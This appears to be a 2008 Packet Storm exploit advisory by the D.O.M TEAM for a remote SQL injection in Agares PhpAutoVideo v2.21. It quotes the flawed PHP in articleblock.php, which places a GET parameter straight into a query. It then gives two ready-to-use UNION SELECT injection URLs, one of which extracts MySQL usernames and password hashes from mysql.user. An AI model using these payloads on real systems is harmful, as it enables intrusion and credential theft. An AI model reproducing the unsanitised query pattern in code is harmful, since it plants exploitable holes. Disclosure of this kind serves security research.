agares-sql.txt

2008-01-12T00:00:00
ID PACKETSTORM:62567
Type packetstorm
Reporter ka0x
Modified 2008-01-12T00:00:00

Description

                                        
                                            `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
Agares PhpAutoVideo v2.21 Remote SQL Injection Vulnerability  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
  
D.O.M TEAM 2008  
we are: ka0x, an0de, xarnuz  
bug found by ka0x  
concat: ka0x01[at]gmail.com>  
#from spain  
  
vulnerability in /includes/articleblock.php  
  
vuln code:  
------------------------------------------------------------------  
$cat = $_GET['articlecat'];  
if ($cat == NULL){ $sql = "SELECT * FROM amcms_articles;"; }  
else{ $sql = "SELECT * FROM amcms_articles WHERE catid=$cat;"; }  
------------------------------------------------------------------  
  
Your user needs to be root@localhost or administrator mysql, check:  
http://[host]/includes/articleblock.php?articlecat=-1/**/union/**/select/**/user()/*  
  
user and password from mysql.user:  
http://[host]/phpautovideo/includes/articleblock.php?articlecat=-1/**/union/**/select/**/concat(user,0x203a3a20,password)/**/from/**/mysql.user/*  
  
`